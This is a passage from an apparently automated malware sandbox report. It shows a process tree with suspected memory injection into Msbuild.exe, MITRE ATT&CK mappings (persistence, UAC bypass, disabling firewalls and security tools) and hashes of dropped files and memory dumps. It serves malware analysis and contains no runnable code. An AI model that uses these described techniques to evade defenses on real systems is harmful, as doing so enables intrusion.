      Suspicious use of AdjustPrivilegeToken
      PID:2068
- - C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
    "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4984
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
      dw20.exe -x -s 800
      4⤵
      Checks processor information in registry
      Enumerates system info in registry
      Suspicious use of AdjustPrivilegeToken
      PID:4996

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:452

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
36KB

MD5
b30d3becc8731792523d599d949e63f5

SHA1
19350257e42d7aee17fb3bf139a9d3adb330fad4

SHA256
b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

SHA512
523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
56KB

MD5
752a1f26b18748311b691c7d8fc20633

SHA1
c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

SHA256
111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

SHA512
a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
64KB

MD5
35845510bfa99e54c773c01864952ca0

SHA1
522d10067a44f9239c0836380c5d011296893a0e

SHA256
6cf0d76f22db0a5ad9df7b8b4f81e7160e26bead13b37e680bc5e39d1752eee2

SHA512
2a5a6b00985a6f5f242c41f19dcbbdd369e5bbe2c49c4b71e6880d02b027064ba2ecf9ec48ba922f6d8fe2792d9ea766a14898037467acf4d85fac4eb703303b

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\Reader\Synchronizer\metadata\Synchronizer

Filesize
92KB

MD5
245950c48f668cf2fcb3c64778e64089

SHA1
3a5a14c820f58e35a3fc6f5de29669f0840587d8

SHA256
a027cf12f2055635a3020f08e0448b2f0314791260ccd25570426088c5b0e307

SHA512
4fc8448536663b551cc716d78715f06d4ed217fbdf755924f0b30aebbb6212798a61c6638f919d5c14bdb6998d6a12f0ca37281f3c7f484c1821fbfc98d4a24d

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\Reader\Synchronizer\metadata\Synchronizer

Filesize
92KB

MD5
aebe0d2eb7a2077a55e57a955e62406a

SHA1
3f811b8148f12220f4b45699135e6d21c9847d8a

SHA256
87aa4c64348b534771f03919b5bdca09596e89f6e0cca0a992bb3d290ec4155a

SHA512
efa1b082925a4e478fcea74764bbacb91d43da8c01c4b360a34e6f7402af23f91c93b5e91c6266120e144b5300e8dae73a62a7b6d7c4328410128f6a72a7baed

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\Reader\Synchronizer\metadata\Synchronizer

Filesize
92KB

MD5
07063e26ba31a720779c6257df0a1ec4

SHA1
f1b5f1b57cb5a06e83bc38bb033bd829ac794fe2

SHA256
2a6aea53e26ee601b2367e8c211ff1efc80a5acaf32f68ff7673977d9be97334

SHA512
a5dfeaff2863f73f6800d98687d62e3d9cf2632b00e3552739892376e27860380fe0846479fe28eaf1ddd69edf32dcd17a530689e325b037b324722aef43ca0c

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\Reader\Synchronizer\metadata\Synchronizer

Filesize
92KB

MD5
4c78bbcd9aeb99bcedde0125542d01c6

SHA1
83c75ac4e962f76d2fc2ec3fe5de13e26b70397c

SHA256
18ab55103253721f7f57f9c60c7a21af2ba1dca128e7638b5d27ea88236b4ab1

SHA512
f6b54e043e28c1e1710eab7b256594f76ce4554cda7d9a3b5a2b062b76a6121add107d8fb358e712c3f3a561c0760dfeb5d15ea95a0322b3f186468380975402

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\Reader\Synchronizer\resources\resource-18

Filesize
3.5MB

MD5
17b8abba81aa32dc79778a6305717ac0

SHA1
e661e0d2247fd7333bd49391b5d66194e845cc2d

SHA256
a0c4a82ac8f55627773a23f421a50a033ece9bc8898fa1d4d5b29a8563dba12b

SHA512
df9381f37f77922aee95e18271ae15fb3c1b46146311a593c10c7113ee5dc3c4ecea2fafee0d466e8d352255f80e0baded36ca4c769d780cbf4f1ca086f1d354

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Filesize
4KB

MD5
1bfe591a4fe3d91b03cdf26eaacd8f89

SHA1
719c37c320f518ac168c86723724891950911cea

SHA256
9cf94355051bf0f4a45724ca20d1cc02f76371b963ab7d1e38bd8997737b13d8

SHA512
02f88da4b610678c31664609bcfa9d61db8d0b0617649981af948f670f41a6207b4ec19fecce7385a24e0c609cbbf3f2b79a8acaf09a03c2c432cc4dce75e9db

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04

Filesize
471B

MD5
aa01aa7cff8214a52702860b2afa4488

SHA1
7c17adde60eb72324802558e908f6f840489b2ca

SHA256
2b6f696bfdfb5cf4c0c4fccd4a4e1d43a662a8d35e1635f54dda4eacfebba03c

SHA512
b44de4fd188d8efa238e7816045b719827bc2f2cca069a6ad338f5e9c26c6825a4b402e94e738fb6ea5b96b9df8ee5da4f59daa8e001c7bf909a75a78cde8dd6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Filesize
338B

MD5
f04de4622273479a3b119fcc4ce25e5a

SHA1
41be467e760b969a6154855cff250be289d94b97

SHA256
6cd32e03ab344ebc4176572ab6bc0bd2196d398b9f6c0151ed5dcdf43c00916f

SHA512
262a9b0a8873ddf9b54154c9fb24b078bd79168a8acbf2c19b74da8f45159ad7f97d616c5af7ff317ade3a7ef84dcfa335b7de7efe403f3d24d18ada1277f4b9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04

Filesize
400B

MD5
87aad28dc7d252bb1241ea069c43e974

SHA1
b81f3218665afe64edba70ba841ffa9b7ee7948d

SHA256
57ce57d233e31d18c77b92d1cc23fb2424a018e344e364049d191c9145a6490e

SHA512
c3305a7eea53507beadb2999b86ea654afd569df6a1f163cbb4928c705bd587c8b3f348cb280cf7559d90c425ce27fcaed373495d98b06f0e7da6793a3a67131

Download Submit
C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

Filesize
12KB

MD5
de648dbdd6b0b03854f0227690e1d21c

SHA1
4b2e65cd63a98cf6691a470479f7cb4833200af0

SHA256
03a0d79b44a9afe23e708b6fc249b52d1716e0627af551e06c2607ee52abebf5

SHA512
5098ce017915e9c32712bec3b1f725354acab8a59c5c87deb88f8e272ca5ff6e020e4d195b695000a26f93d62e221bbb2563b153626242c5e566ae3823f0a27d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES83D6.tmp

Filesize
1KB

MD5
6061c24468f396d259ffc53dd4c906f9

SHA1
f3f2369244b45a594920cc29cbcf3cc1855b058a

SHA256
a0eb651bf3830ca721367f00c1575f1174be14752cffdaa0d899c6948e7f602e

SHA512
1ed94764ac5488a6289162db5d566af03ebbd920cd3f6ed786e430eae9e47ba19341e72a15bb9965b809c0db5dc39cee4ec747a67335813d61efe0f04339c5e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p2cc5bly.uba.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\atq5noat\atq5noat.dll

Filesize
3KB

MD5
2d82f3714d5cb0a3fef752b991d2078b

SHA1
d95dfff0e5e6937d13e3cadacfddc641d2b56768

SHA256
c9344a71cfffd29ea4e9d313f0f941d314217dee73970d9ac8d3fc48ba5fd0ce

SHA512
526d8551d51034f94e5c93d1aa8657226c0063329df6a248eb6be2823a087d553c4e00125a905638391fb7e4f7594ec424e512690737a92069938053337fd301

Download Submit
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata

Filesize
5.2MB

MD5
141f3b448cc8d3054ccdad1334616583

SHA1
0e48b93c00c7c83f36782aaa0b9b902a2e03d935

SHA256
e37ac866c10edfceae178fb0c41757142ba2a6ccaa19a7749f2cc6b243491b95

SHA512
077d467dca91a9603c481e0183f45c7f87e354a4d8ca5847e5120c952ff6e2665ded9bfc68090916c942b8ed4044067016dd1c75b89bbb45e7e0b6ec3ccd9a78

Download Submit
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata

Filesize
14KB

MD5
947f93fe0eed44767626846f28cfde05

SHA1
f6276d2a2b4a9d8a8e23c84019cd3961e9d60e88

SHA256
06a576fc14e995c437b26c0d150b4e84cd745e7cedfd972a84b42b51c842fc9b

SHA512
f97739eb0d22a99b06ef340aefb0d5a5b45b679d28accff3de2565166392c7d2fabaa33f945696f7d456ba2ef323f48e43eb26578f71c8b2e8ed32fb4dc69bc9

Download Submit
C:\Users\Admin\Downloads\John_Smith_Tax_2023.pdf

Filesize
248KB

MD5
7b47ca0383d2409fdc4ae629308bf4bc

SHA1
e16bdfeef9d2d98ca0cb5eb8d334b532c6b67823

SHA256
abd03973677c82081db0b0af02ca302bb5a854f96c52acd2113ec110b373daa6

SHA512
60e29872f50425ad07c2b25829992ee171019a61740b512bd4612a3c5b12c48fe6703c286280c3591c5d567a7912dc72358cf8fdc981236510237ccd27805a39

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\atq5noat\CSC83C325F13DA84E7B89C65FAAF4ECDE27.TMP

Filesize
652B

MD5
6bf609dc2b1c7f6f42d96de2e10b0b8e

SHA1
20eb904818bb118f237a8ffa242e5db92310d4a1

SHA256
d9a6aaf935e4dbcd0f08c4c91aad957ad83fff6b1e0b8e68fe17d4f2ce50aaae

SHA512
a2a1575d008fc9ac10e788856c0c40b12f0fa2e5f33cc23609dd2cd65cdb0ef941657643323c72d6984e9475e617ffcde80be0206b79f12dd2cc6afd364f5ddc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\atq5noat\atq5noat.0.cs

Filesize
870B

MD5
e06ebf853695db38aaac82c9af297ae4

SHA1
ef98bacec5ac2ae3bf24aac8ed56935a25c1f064

SHA256
79c1099bad1dccb1d151887071b8e8b5d679de343903895fa28e45b791cae344

SHA512
036449d932066d506a6bd7c08df311bf1ed5e7b3595004941fe1c39a8e9f9b0d08d43b33a180d4851f88d49c98a17b05cf5235858ada611306fc602cfd582759

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\atq5noat\atq5noat.cmdline

Filesize
369B

MD5
e806d61ff2b8523fcb1ff9efde118d9d

SHA1
874c90ad705c6e1e9f47917599219433dd981a19

SHA256
718edc44fe29b88bbf3c06b36274fab4b8d1c1aba1d824d8130c827fe2f3e59f

SHA512
00b233b8603913697221af124678fbfa2af76c6a57cd86b2c9ef827d51fb1bcf3b4c0c0ca7aaaa82c49253242656b8041c4cb9e74b1b9fa4e1cf97cd9a8738bc

Download Submit
memory/912-113-0x0000000000400000-0x0000000000486000-memory.dmp

Filesize
536KB

Download
memory/912-123-0x0000000069990000-0x0000000069F41000-memory.dmp

Filesize
5.7MB

Download
memory/912-116-0x00000000016B0000-0x00000000016C0000-memory.dmp

Filesize
64KB

Download
memory/912-115-0x0000000069990000-0x0000000069F41000-memory.dmp

Filesize
5.7MB

Download
memory/912-114-0x0000000069990000-0x0000000069F41000-memory.dmp

Filesize
5.7MB

Download
memory/1108-252-0x000000000E3C0000-0x000000000E3E1000-memory.dmp

Filesize
132KB

Download
memory/2120-108-0x00000000052B0000-0x0000000005856000-memory.dmp

Filesize
5.6MB

Download
memory/2120-129-0x00000000065D0000-0x0000000006620000-memory.dmp

Filesize
320KB

Download
memory/2120-111-0x0000000004DA0000-0x0000000004E3C000-memory.dmp

Filesize
624KB

Download
memory/2120-112-0x0000000005DF0000-0x0000000005FB2000-memory.dmp

Filesize
1.8MB

Download
memory/2120-322-0x0000000004E40000-0x0000000004E50000-memory.dmp

Filesize
64KB

Download
memory/2120-109-0x000000006D1A0000-0x000000006D951000-memory.dmp

Filesize
7.7MB

Download
memory/2120-107-0x0000000004BC0000-0x0000000004C26000-memory.dmp

Filesize
408KB

Download
memory/2120-321-0x000000006D1A0000-0x000000006D951000-memory.dmp

Filesize
7.7MB

Download
memory/2120-256-0x00000000065C0000-0x00000000065CA000-memory.dmp

Filesize
40KB

Download
memory/2120-105-0x0000000000500000-0x0000000000586000-memory.dmp

Filesize
536KB

Download
memory/2120-110-0x0000000004D00000-0x0000000004D92000-memory.dmp

Filesize
584KB

Download
memory/4764-140-0x000002EBDD460000-0x000002EBDD470000-memory.dmp

Filesize
64KB

Download
memory/4764-104-0x000002EBDD460000-0x000002EBDD470000-memory.dmp

Filesize
64KB

Download
memory/4764-5-0x000002EBF5BD0000-0x000002EBF5BF2000-memory.dmp

Filesize
136KB

Download
memory/4764-106-0x000002EBDD460000-0x000002EBDD470000-memory.dmp

Filesize
64KB

Download
memory/4764-9-0x00007FFBC2540000-0x00007FFBC3002000-memory.dmp

Filesize
10.8MB

Download
memory/4764-96-0x00007FFBC2540000-0x00007FFBC3002000-memory.dmp

Filesize
10.8MB

Download
memory/4764-95-0x000002EBDD810000-0x000002EBDD82A000-memory.dmp

Filesize
104KB

Download
memory/4764-94-0x000002EBDD7E0000-0x000002EBDD7EE000-memory.dmp

Filesize
56KB

Download
memory/4764-255-0x00007FFBC2540000-0x00007FFBC3002000-memory.dmp

Filesize
10.8MB

Download
memory/4764-10-0x000002EBDD460000-0x000002EBDD470000-memory.dmp

Filesize
64KB

Download
memory/4764-30-0x000002EBF63D0000-0x000002EBF63D8000-memory.dmp

Filesize
32KB

Download
memory/4764-13-0x000002EBF6140000-0x000002EBF6302000-memory.dmp

Filesize
1.8MB

Download
memory/4764-12-0x000002EBDD460000-0x000002EBDD470000-memory.dmp

Filesize
64KB

Download
memory/4764-11-0x000002EBDD460000-0x000002EBDD470000-memory.dmp

Filesize
64KB

Download
memory/4984-128-0x0000000001490000-0x00000000014A0000-memory.dmp

Filesize
64KB

Download
memory/4984-127-0x0000000069940000-0x0000000069EF1000-memory.dmp

Filesize
5.7MB

Download
memory/4984-139-0x0000000069940000-0x0000000069EF1000-memory.dmp

Filesize
5.7MB

Download
memory/4984-130-0x0000000069940000-0x0000000069EF1000-memory.dmp

Filesize
5.7MB

Download